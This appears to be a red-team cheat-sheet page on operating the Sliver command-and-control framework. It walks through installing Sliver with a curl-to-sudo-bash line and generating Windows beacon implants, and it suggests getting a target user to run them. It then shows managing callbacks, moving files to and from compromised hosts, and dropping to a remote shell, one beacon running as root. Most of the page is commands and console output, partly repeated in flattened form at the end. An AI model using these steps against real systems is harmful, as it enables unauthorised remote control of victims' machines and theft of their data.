Sliver

Install

curl https://sliver.sh/install|sudo bash and then run sliver

Install the armory

This will install all the third party post exploitation scripts.

sliver > armory install all

Start a listener

sliver > https local-ip-address --lhost -D

Generate beacons

This creates an executable that can be launched on the platform of choice.

sliver > generate beacon --http http://local-ip-address --os windows --save local-path-for-executable

Execute beacons

Get the executable file you just created, get it to your target user or host and execute it (or get someone to execute it for you) – you’ll see a call back and a beacon entry show up in the beacons list.

List beacons

sliver > beacons

 ID         Name               Transport   Username   Operating System   Last Check-In   Next Check-In 
========== ================== =========== ========== ================== =============== ===============
 d97fcc0b   UGLIEST_FAMILIAR   http(s)     op1user    linux/amd64        1h12m2s         1h10m47s      
 7fae33ed   UGLIEST_FAMILIAR   http(s)     op1user    linux/amd64        43m42s          42m19s        
 d2355aee   UGLIEST_FAMILIAR   http(s)     op2user    linux/amd64        29m59s          28m50s        
 aedc2bbd   UGLIEST_FAMILIAR   http(s)     op3user      linux/amd64        29m44s          28m34s        
 6f3596af   UGLIEST_FAMILIAR   http(s)     root       linux/amd64        38s             36s

Use beacons

In order to set the current context to a particular beacon, I use the generated ID from the listing above. The prompt will change to contain the name of the selected beacon one it’s set as your active one. You can now issue commands.

sliver > use 6f3596af

[*] Active beacon UGLIEST_FAMILIAR (6f3596af-187d-4b0c-b264-d7482fc6d80b)

sliver (UGLIEST_FAMILIAR) >

Show task list

You can see the status of currently queued and completed tasks issued to a beacon as below:

sliver (UGLIEST_FAMILIAR) > tasks

 ID         State       Message Type   Created                         Sent                            Completed                     
========== =========== ============== =============================== =============================== ===============================
 49ead4a9   completed   Ls             Tue, 18 Oct 2022 23:58:08 EDT   Tue, 18 Oct 2022 23:58:52 EDT   Tue, 18 Oct 2022 23:58:52 EDT

Recall task output

You can re-review the output for a task and get more information about it using fetch and the task’s ID number.

sliver (UGLIEST_FAMILIAR) > tasks fetch 49ead4a9

+------------------------------------------------------+
| Beacon Task   | 49ead4a9-5859-465f-90e1-1c18ffbcdbdc |
+---------------+--------------------------------------+
| State         | ✅ Completed                         |
| Description   | LsReq                                |
| Created       | Tue, 18 Oct 2022 23:58:08 EDT        |
| Sent          | Tue, 18 Oct 2022 23:58:52 EDT        |
| Completed     | Tue, 18 Oct 2022 23:58:52 EDT        |
| Request Size  | 18 B                                 |
| Response Size | 639 B                                |
+------------------------------------------------------+

/tmp (3 items, 16.1 MiB)
=========================
dtrwxrwxrwx  .font-unix                                                                         <dir>      Thu Sep 01 15:33:00 -0400 2022
dtrwxrwxrwx  .ICE-unix                                                                          <dir>      Thu Sep 01 15:33:00 -0400 2022
dtrwxrwxrwx  .Test-unix                                                                         <dir>      Thu Sep 01 15:33:00 -0400 2022

Upload/download a file using beacons

sliver (UGLIEST_FAMILIAR) > upload /path/to/local/file /path/to/remote/destination
[*] Wrote file to /tmp/xxxx.sh

sliver (UGLIEST_FAMILIAR) > download /path/to/remote/source /path/to/local/destination/
[*] Wrote file to /tmp/xxxx.sh

Prepare interactive session

sliver (UGLIEST_FAMILIAR) > interactive

[*] Using beacon's active C2 endpoint: http://x.x.x.x
[*] Tasked beacon UGLIEST_FAMILIAR (5e13a94a)
[*] Session 13b20a10 UGLIEST_FAMILIAR - x.x.x.x:48738 (op1user) - linux/amd64 - Wed, 19 Oct 2022 00:10:05 EDT

List interactive sessions

sliver (UGLIEST_FAMILIAR) > sessions

 ID         Transport   Remote Address         Hostname   Username   Operating System   Health  
========== =========== ====================== ========== ========== ================== =========
 13b20a10   http(s)     x.x.x.x:48738   op1    op1user       linux/amd64        [ALIVE]

Switch to interactive sessions

Using the session ID from above, we will use the familiar from meterpreter/metasploit sessions -i. The prompt will change colors to red once this is complete.

sliver (UGLIEST_FAMILIAR) > sessions -i 13b20a10

[*] Active session UGLIEST_FAMILIAR (13b20a10)

sliver (UGLIEST_FAMILIAR) >

Switch to full shell

Once in an interactive session, you can drop to a full purpose shell.

sliver (UGLIEST_FAMILIAR) > shell

? This action is bad OPSEC, are you an adult? Yes

[*] Wait approximately 10 seconds after exit, and press <enter> to continue
[*] Opening shell tunnel (EOF to exit) ...

[*] Started remote shell with pid 29576

op1user@op1:/tmp#

PreviousC2 NextPowerUp

Last updated 8 months ago

sliver > beacons ID Name Transport Username Operating System Last Check-In Next Check-In ========== ================== =========== ========== ================== =============== =============== d97fcc0b UGLIEST_FAMILIAR http(s) op1user linux/amd64 1h12m2s 1h10m47s 7fae33ed UGLIEST_FAMILIAR http(s) op1user linux/amd64 43m42s 42m19s d2355aee UGLIEST_FAMILIAR http(s) op2user linux/amd64 29m59s 28m50s aedc2bbd UGLIEST_FAMILIAR http(s) op3user linux/amd64 29m44s 28m34s 6f3596af UGLIEST_FAMILIAR http(s) root linux/amd64 38s 36s

sliver (UGLIEST_FAMILIAR) > tasks ID State Message Type Created Sent Completed ========== =========== ============== =============================== =============================== =============================== 49ead4a9 completed Ls Tue, 18 Oct 2022 23:58:08 EDT Tue, 18 Oct 2022 23:58:52 EDT Tue, 18 Oct 2022 23:58:52 EDT

sliver (UGLIEST_FAMILIAR) > upload /path/to/local/file /path/to/remote/destination [*] Wrote file to /tmp/xxxx.sh sliver (UGLIEST_FAMILIAR) > download /path/to/remote/source /path/to/local/destination/ [*] Wrote file to /tmp/xxxx.sh

sliver (UGLIEST_FAMILIAR) > interactive [*] Using beacon's active C2 endpoint: http://x.x.x.x [*] Tasked beacon UGLIEST_FAMILIAR (5e13a94a) [*] Session 13b20a10 UGLIEST_FAMILIAR - x.x.x.x:48738 (op1user) - linux/amd64 - Wed, 19 Oct 2022 00:10:05 EDT

sliver (UGLIEST_FAMILIAR) > sessions ID Transport Remote Address Hostname Username Operating System Health ========== =========== ====================== ========== ========== ================== ========= 13b20a10 http(s) x.x.x.x:48738 op1 op1user linux/amd64 [ALIVE]

sliver (UGLIEST_FAMILIAR) > shell ? This action is bad OPSEC, are you an adult? Yes [*] Wait approximately 10 seconds after exit, and press <enter> to continue [*] Opening shell tunnel (EOF to exit) ... [*] Started remote shell with pid 29576 op1user@op1:/tmp#